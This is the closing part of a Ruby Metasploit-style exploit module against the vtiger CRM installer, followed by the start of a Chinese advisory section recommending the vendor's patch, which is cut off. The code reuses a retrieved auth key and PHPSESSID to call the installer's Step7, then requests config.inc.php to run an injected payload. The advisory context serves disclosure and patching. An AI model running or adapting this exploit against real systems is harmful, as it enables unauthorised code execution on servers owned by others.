if authkey.blank?
print_error("No AuthKey found")
return
elsif phpsessid.blank?
print_error("No PHP Session ID found")
return
end
print_status("Retrieved Authkey : #{authkey}")
print_status("Retrieved PHPSESSID : #{phpsessid}")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
'cookie' => phpsessid,
'vars_get' =>
{
'module' => 'Install',
'view' => 'Index',
'mode' => 'Step7',
'auth_key' => authkey
}
})
print_status("Executing payload...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'config.inc.php'),
'vars_get' => { rand_arg => '1' }
})
else
print_error("No auth_key pattern found")
end
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
vtiger
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: